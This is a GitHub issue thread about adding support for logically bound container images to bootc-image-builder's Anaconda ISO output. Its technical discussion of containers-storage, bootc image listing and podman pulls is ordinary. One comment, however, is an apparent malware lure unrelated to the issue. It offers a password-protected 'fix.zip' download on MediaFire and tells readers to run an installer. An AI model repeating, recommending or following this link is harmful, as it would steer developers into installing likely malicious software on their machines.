### ISSUE TITLE
add support for logically bound images for anaconda ISO

### ISSUE THREAD

**Issue by cgwalters** [osbuild/bootc-image-builder#622]
We landed support for [logically bound images](https://github.com/containers/bootc/issues/128) to bootc; this transparently works when generating a qcow2 today with bib because we leverage `bootc install to-filesystem`. However, it doesn't transparently work with the Anaconda ISO because bib doesn't know how to inject these extra images into the lookaside cache on the ISO.

This also strongly relates to https://github.com/rhinstaller/anaconda/discussions/5197 where Anaconda itself would learn to use `bootc install to-filesystem`. 

Connecting these threads, I think it would make sense actually to switch to using `containers-storage:` (unpacked representation, as opposed to `dir` for both the bootc image in the ISO and all LBIs).

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ondrejbudai** [comment]
Seems like the anaconda's side got unblocked by https://github.com/containers/bootc/pull/915. Basically: [ostree-rs-ext is now merged inside bootc](https://github.com/containers/bootc/pull/875), and since containers/bootc#915, `ostree container image deploy` (which anaconda uses) goes through the bootc code path, so LBIs just automagically work without needing to adjust anaconda.

So we need:

- include `containers-storage` instead of `dir` inside the ISO.
- copy there LBIs in addition to the bootc image. They can be enumerated using `bootc image list --type logical --format json`.

**Comment by cgwalters** [comment]
> copy there LBIs in addition to the bootc image. They can be enumerated using bootc image list --type logical --format json.

Yeah, though at the moment that is an experimental API. I think we can stabilize it...but maybe the more stable way to do this is to just follow the links in `/usr/lib/bootc/bound-images.d` and parse the quadlets.

Alternatively...what I actually like more than that is we add `bootc install copy-to containers-storage:/path/to/storage` or so that automatically handles this, then all that needs to be done in BIB or other disk tools is to just run that and all the images would appear in that c/storage instance.

**Comment by cgwalters** [comment]
This one came up in a chat today because some folks are trying to use LBIs today for tests, and it's pain point that while LBIs do work with b-i-b, one needs to know to pull them outside of b-i-b which is not ergonomic in build pipelines.

I guess we probably do need a simple CLI to enumerate the bound images, then bib could use it directly, and in a CI pipeline one could just do:

- podman run <image> bootc images list --type=logical --name-only | xargs podman pull
- podman run bootc-image-builder ... <image>

This all could be papered over in the existing Github action etc. A key bit here being `xargs podman pull` so we reuse the pull secrets setup on the host already.

---

That said, I would also personally be fine with adding `bootc-image-builder --authfile` - then we can do pulls from inside as well.
